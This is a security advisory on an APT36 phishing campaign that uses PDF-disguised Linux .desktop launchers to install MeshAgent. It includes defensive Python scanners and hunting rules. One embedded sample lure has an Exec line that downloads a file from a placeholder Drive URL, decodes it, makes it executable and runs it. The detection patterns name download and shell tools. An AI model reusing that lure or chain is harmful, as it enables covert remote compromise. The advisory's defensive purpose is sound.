The Sindoor Dropper is a new phishing campaign attributed to APT36 (Transparent Tribe, Mythic Leopard, G0134), targeting Indian entities via spear-phishing emails. What makes this campaign stand out is its focus on Linux systems, using weaponized .desktop files that mimic PDF icons to trick users into executing them. The final payload is MeshAgent, a legitimate remote administration tool misused for full remote access.
Severity Level: High
Threat Details
- Attack Vector and Infection Chain
  - The initial access vector is a spear-phishing email carrying a malicious .desktop launcher disguised as a PDF document (PDF icon and document-like name).
  - When the user opens it, the launcher displays a decoy PDF to hold the user's attention while a background command chain fetches the next stage.
  - The .desktop file starts a multi-stage execution chain; each stage delivers an obfuscated, encrypted binary, including:
    - AES-encrypted, UPX-packed Go binaries
    - Custom decryptors and downloaders
    - Final payload: MeshAgent, a legitimate remote administration agent abused for persistent remote access
- Execution Chain
  - Stage 1: the .desktop file executes and downloads an encrypted loader from Google Drive.
  - Stage 2: the loader decrypts the next stage with hardcoded keys (e.g., NIC0fficialDB_Auth, WOrkiNgtoDesksSS8123).
  - Stage 3: MeshAgent is decrypted and installed.
- Anti-Analysis Techniques
  - Obfuscation via Base64 encoding combined with DES-CBC encryption
  - ELF magic bytes removed from the stored payload so that file-type based scanning does not recognize it as an executable
  - Anti-VM checks (e.g., MAC address filtering, uptime check, OS vendor checks)
- Campaign Scale
  - Infrastructure set up in mid-August 2025
  - Targeting is geographically focused on India
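The launcher masquerade described above can be triaged mechanically. The following Python script is an added example written for this advisory, not code from the Nextron report or from the campaign: it parses the [Desktop Entry] group of a .desktop file and scores the combination of a document-like Name/Icon with an Exec line that spawns a shell, downloads, decodes and stages files. The two sample launchers, the regular expressions and the threshold of 4 are assumptions chosen for illustration, not indicators from the campaign.

```python
"""Triage scanner for weaponized .desktop launchers.

Added example for this advisory; not code from the Nextron report or the
campaign. Flags the lure pattern: a launcher whose Name/Icon claims to be a
document while Exec spawns a shell that downloads, decodes and runs something.
The scoring weights and the threshold are assumptions.
"""
import configparser
import os
import re
import sys
from dataclasses import dataclass, field

# Constructed sample lure in the style described above. The URL, file names
# and paths are placeholders, not the campaign's real indicators.
LURE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Operation_Brief.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open /tmp/decoy.pdf; curl -sL https://drive.google.com/uc?id=PLACEHOLDER -o /tmp/.x; base64 -d /tmp/.x > /tmp/.y; chmod +x /tmp/.y; /tmp/.y &"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Document Viewer
Icon=org.gnome.Evince
Exec=evince %U
"""

DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)
DOC_ICON = re.compile(r"pdf|office-document|word|excel", re.I)
SHELL_C = re.compile(r"\b(ba|z|da)?sh\s+-c\b")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
DECODER = re.compile(r"\b(base64|xxd|openssl\s+enc|gpg)\b")
# User-writable staging dirs or hidden path components (e.g. /tmp/.x)
WRITABLE_PATH = re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|\$HOME|~/|/\.)")


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self):
        return self.score >= 4  # assumed threshold


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict. Keys are case-sensitive in
    the freedesktop spec and field codes like %U must survive, so a raw parser
    with '=' as the only delimiter is used."""
    cp = configparser.RawConfigParser(delimiters=("=",), strict=False)
    cp.optionxform = str
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp.items("Desktop Entry"))


def triage(text):
    """Score one launcher; each reason is an independent weak signal and the
    document-disguise plus shell/downloader combination is what adds up."""
    entry = parse_desktop(text)
    v = Verdict()
    name, icon, exe = entry.get("Name", ""), entry.get("Icon", ""), entry.get("Exec", "")
    if DOC_NAME.search(name) or DOC_ICON.search(icon):
        v.reasons.append("presents itself as a document (Name/Icon)")
        v.score += 2
    if SHELL_C.search(exe):
        v.reasons.append("Exec spawns a shell with -c")
        v.score += 2
    if DOWNLOADER.search(exe):
        v.reasons.append("Exec invokes a downloader")
        v.score += 2
    if DECODER.search(exe):
        v.reasons.append("Exec decodes or decrypts content")
        v.score += 1
    if WRITABLE_PATH.search(exe):
        v.reasons.append("Exec stages files in a user-writable or hidden path")
        v.score += 1
    return v


def scan_paths(paths):
    """Walk directories, triage every *.desktop file, return the flagged ones."""
    hits = []
    for root in paths:
        for dirpath, _, files in os.walk(root):
            for fn in files:
                if not fn.endswith(".desktop"):
                    continue
                p = os.path.join(dirpath, fn)
                try:
                    with open(p, encoding="utf-8", errors="replace") as fh:
                        v = triage(fh.read())
                except (OSError, configparser.Error):
                    continue
                if v.suspicious:
                    hits.append((p, v))
    return hits


if __name__ == "__main__":
    targets = sys.argv[1:] or [os.path.expanduser("~/Desktop"), os.path.expanduser("~/Downloads")]
    for path, verdict in scan_paths(targets):
        print(f"{path}: score={verdict.score}; " + "; ".join(verdict.reasons))
```

Run it with one or more directories as arguments (it defaults to ~/Desktop and ~/Downloads). The regexes are deliberately narrow so that legitimate launchers such as the Evince sample score zero; tune the weights to your environment rather than treating the threshold as authoritative.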
MITRE ATT&CK
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Phishing: Spearphishing Attachment | T1566.001 |
| Execution | User Execution: Malicious File | T1204.002 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Obfuscated Files or Information: Software Packing (UPX) | T1027.002 |
| Defense Evasion | Masquerading: Masquerade File Type | T1036.008 |
| Defense Evasion | Virtualization/Sandbox Evasion: System Checks | T1497.001 |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 |
| Command and Control | Remote Access Software | T1219 |
| Command and Control | Application Layer Protocol: Web Protocols (WebSocket over HTTPS) | T1071.001 |
| Command and Control | Dynamic Resolution | T1568.002 |
| Discovery | System Information Discovery | T1082 |
| Discovery | Virtualization/Sandbox Evasion | T1497 |
Recommendations
- Block or quarantine email attachments with the .desktop extension, including double-extension names such as name.pdf.desktop, and treat launchers arriving by email as executables rather than documents.
- Strip or sandbox links pointing to public file hosts such as drive[.]google[.]com, which this campaign uses to host the encrypted loader.
- Consider AppArmor or SELinux to confine user-session processes, in particular anything spawned from the file manager, mail client or Downloads directory.
- Ensure all Linux systems are running the latest kernel and security updates.
- Monitor outbound connections to subdomains of *[.]ddns[.]net on port 443, especially WebSocket (wss://) sessions, which are indicative of MeshAgent traffic to its controlling server.
- Monitor for execution of files named mayuw, shjdfhd, inter_ddns or server2; a file name alone is weak evidence, so weight hits that run from user-writable or hidden paths such as /tmp.
- Block the IOCs at their respective controls:
https://www.virustotal.com/gui/collection/ede4120c68dbbb2a2a36ef4cf26ba37a5ae72014c5465c39077c7034b7e64371/iocs
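To make the monitoring items above concrete, the following Python script is an added example for this advisory, not code from the Nextron report: it expresses the three hunts (suspect file names, *.ddns.net on 443 with wss://, and non-browser downloads from Google Drive) as rules over a constructed JSON-lines event feed. The field names (type, image, dst_host, dst_port, url), the sample hosts and paths, and the severity scheme are assumptions, not any product's schema or real campaign indicators.

```python
"""Hunting rules for the indicators in the recommendations above.

Added example for this advisory, not from the Nextron report. Runs over a
constructed newline-delimited JSON feed in a generic EDR/proxy shape; the
field names are assumptions, not any vendor's schema, and the sample hosts
and paths are placeholders rather than real IOCs.
"""
import json
import os
import sys
from dataclasses import dataclass

# File names called out in the advisory; on their own they are weak evidence.
SUSPECT_BASENAMES = {"mayuw", "shjdfhd", "inter_ddns", "server2"}
DDNS_SUFFIX = ".ddns.net"
# Hosts used for Drive downloads (assumed list) and processes expected to reach them.
FILE_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
BROWSERS = {"firefox", "chrome", "chromium", "chromium-browser", "brave", "epiphany"}
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample feed: one host that runs the staged binary and beacons,
# one that runs a legitimately named service and fetches a file with curl.
EVENTS = """\
{"ts":"2025-08-20T09:14:02Z","type":"process","host":"wks-17","user":"analyst","image":"/tmp/.cache/mayuw","cmdline":"/tmp/.cache/mayuw","parent":"bash"}
{"ts":"2025-08-20T09:14:05Z","type":"network","host":"wks-17","image":"/tmp/.cache/mayuw","dst_host":"example-host.ddns.net","dst_port":443,"proto":"tcp","url":"wss://example-host.ddns.net:443/"}
{"ts":"2025-08-20T09:15:11Z","type":"network","host":"wks-17","image":"/usr/bin/firefox","dst_host":"www.example.org","dst_port":443,"proto":"tcp","url":"https://www.example.org/"}
{"ts":"2025-08-20T09:16:00Z","type":"process","host":"wks-22","user":"dev","image":"/opt/app/server2","cmdline":"/opt/app/server2 --port 8080","parent":"systemd"}
{"ts":"2025-08-20T09:17:30Z","type":"network","host":"wks-22","image":"/usr/bin/curl","dst_host":"drive.google.com","dst_port":443,"proto":"tcp","url":"https://drive.google.com/uc?export=download&id=PLACEHOLDER"}
"""


@dataclass
class Alert:
    rule: str
    severity: str
    ts: str
    host: str
    detail: str


def _basename(path):
    return os.path.basename(path or "")


def _staged(path):
    """True for user-writable staging dirs or any hidden path component."""
    return path.startswith(STAGING_DIRS) or "/." in path


def rule_suspect_filename(ev):
    """Process event whose binary carries one of the advisory's file names;
    escalate when it runs from a staging or hidden directory."""
    if ev.get("type") != "process":
        return None
    image = ev.get("image", "")
    if _basename(image) not in SUSPECT_BASENAMES:
        return None
    sev = "high" if _staged(image) else "medium"
    return Alert("suspect_filename", sev, ev["ts"], ev["host"], f"{image} (parent {ev.get('parent')})")


def rule_ddns_c2(ev):
    """Outbound 443 to *.ddns.net; a wss:// URL matches the MeshAgent pattern."""
    if ev.get("type") != "network":
        return None
    host = (ev.get("dst_host") or "").lower()
    if not host.endswith(DDNS_SUFFIX) or ev.get("dst_port") != 443:
        return None
    url = ev.get("url") or ""
    sev = "high" if url.startswith("wss://") else "medium"
    return Alert("ddns_c2", sev, ev["ts"], ev["host"], f"{ev.get('image')} -> {url or host}")


def rule_nonbrowser_filehost(ev):
    """Drive downloads by curl/wget/loaders rather than a browser."""
    if ev.get("type") != "network":
        return None
    if (ev.get("dst_host") or "").lower() not in FILE_HOSTS:
        return None
    if _basename(ev.get("image")) in BROWSERS:
        return None
    return Alert("nonbrowser_filehost", "low", ev["ts"], ev["host"], f"{ev.get('image')} -> {ev.get('url')}")


RULES = (rule_suspect_filename, rule_ddns_c2, rule_nonbrowser_filehost)


def hunt(lines):
    """Apply every rule to every parseable event, in feed order."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        for rule in RULES:
            alert = rule(ev)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    src = open(sys.argv[1]) if len(sys.argv) > 1 else EVENTS.splitlines()
    for a in hunt(src):
        print(f"[{a.severity:6}] {a.ts} {a.host} {a.rule}: {a.detail}")
```

On the sample feed the staged mayuw process and its wss:// beacon to a ddns.net host come out high, the server2 under /opt comes out medium (name match only), and the curl fetch from Drive comes out low; the firefox session produces nothing. Correlating the three rules by host and time window is where the real signal is, since each rule alone will fire on benign activity.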
Source:
- https://www.nextron-systems.com/2025/08/29/sindoor-dropper-new-phishing-campaign/